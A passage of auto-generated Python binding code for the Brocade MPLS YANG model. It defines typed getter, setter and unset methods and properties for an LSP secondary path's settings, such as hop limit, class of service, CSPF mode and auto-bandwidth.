def _get_lsp_adaptive(self):
return self.__lsp_adaptive
def _set_lsp_adaptive(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_adaptive must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_adaptive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_adaptive(self):
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_reoptimize_timer(self):
return self.__lsp_reoptimize_timer
def _set_lsp_reoptimize_timer(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_reoptimize_timer must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_reoptimize_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_reoptimize_timer(self):
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_commit(self):
return self.__lsp_commit
def _set_lsp_commit(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_commit must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_commit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_commit(self):
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_record(self):
return self.__lsp_record
def _set_lsp_record(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_record must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__lsp_record = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_record(self):
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
def _get_lsp_cos(self):
return self.__lsp_cos
def _set_lsp_cos(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cos must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cos(self):
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_hop_limit(self):
return self.__lsp_hop_limit
def _set_lsp_hop_limit(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_hop_limit must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__lsp_hop_limit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_hop_limit(self):
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_lsp_cspf_computation_mode(self):
return self.__lsp_cspf_computation_mode
def _set_lsp_cspf_computation_mode(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cspf_computation_mode must be of a type compatible with cspf-computation-mode""",
'defined-type': "brocade-mpls:cspf-computation-mode",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)""",
})
self.__lsp_cspf_computation_mode = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cspf_computation_mode(self):
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
def _get_lsp_traffic_engineering(self):
return self.__lsp_traffic_engineering
def _set_lsp_traffic_engineering(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_traffic_engineering must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_traffic_engineering = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_traffic_engineering(self):
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
def _get_priority(self):
return self.__priority
def _set_priority(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """priority must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__priority = t
if hasattr(self, '_set'):
self._set()
def _unset_priority(self):
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
def _get_lsp_exclude_any(self):
return self.__lsp_exclude_any
def _set_lsp_exclude_any(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_exclude_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_exclude_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_exclude_any(self):
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_include_any(self):
return self.__lsp_include_any
def _set_lsp_include_any(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_any(self):
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_include_all(self):
return self.__lsp_include_all
def _set_lsp_include_all(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_all must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_all = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_all(self):
self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_secpath_soft_preemption(self):
return self.__secpath_soft_preemption
def _set_secpath_soft_preemption(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_soft_preemption must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_soft_preemption = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_soft_preemption(self):
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_secpath_auto_bandwidth(self):
return self.__lsp_secpath_auto_bandwidth
def _set_lsp_secpath_auto_bandwidth(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_secpath_auto_bandwidth must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_secpath_auto_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_secpath_auto_bandwidth(self):
self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
secpath_name = __builtin__.property(_get_secpath_name, _set_secpath_name)
secpath_standby = __builtin__.property(_get_secpath_standby, _set_secpath_standby)
secpath_bfd = __builtin__.property(_get_secpath_bfd, _set_secpath_bfd)
secpath_cspf = __builtin__.property(_get_secpath_cspf, _set_secpath_cspf)
secpath_ipmtu = __builtin__.property(_get_secpath_ipmtu, _set_secpath_ipmtu)
lsp_adaptive = __builtin__.property(_get_lsp_adaptive, _set_lsp_adaptive)
lsp_reoptimize_timer = __builtin__.property(_get_lsp_reoptimize_timer, _set_lsp_reoptimize_timer)
lsp_commit = __builtin__.property(_get_lsp_commit, _set_lsp_commit)
lsp_record = __builtin__.property(_get_lsp_record, _set_lsp_record)
lsp_cos = __builtin__.property(_get_lsp_cos, _set_lsp_cos)
lsp_hop_limit = __builtin__.property(_get_lsp_hop_limit, _set_lsp_hop_limit)
lsp_cspf_computation_mode = __builtin__.property(_get_lsp_cspf_computation_mode, _set_lsp_cspf_computation_mode)
lsp_traffic_engineering = __builtin__.property(_get_lsp_traffic_engineering, _set_lsp_traffic_engineering)
priority = __builtin__.property(_get_priority, _set_priority)
lsp_exclude_any = __builtin__.property(_get_lsp_exclude_any, _set_lsp_exclude_any)
lsp_include_any = __builtin__.property(_get_lsp_include_any, _set_lsp_include_any)
lsp_include_all = __builtin__.property(_get_lsp_include_all, _set_lsp_include_all)
secpath_soft_preemption = __builtin__.property(_get_secpath_soft_preemption, _set_secpath_soft_preemption)
lsp_secpath_auto_bandwidth = __builtin__.property(_get_lsp_secpath_auto_bandwidth, _set_lsp_secpath_auto_bandwidth)
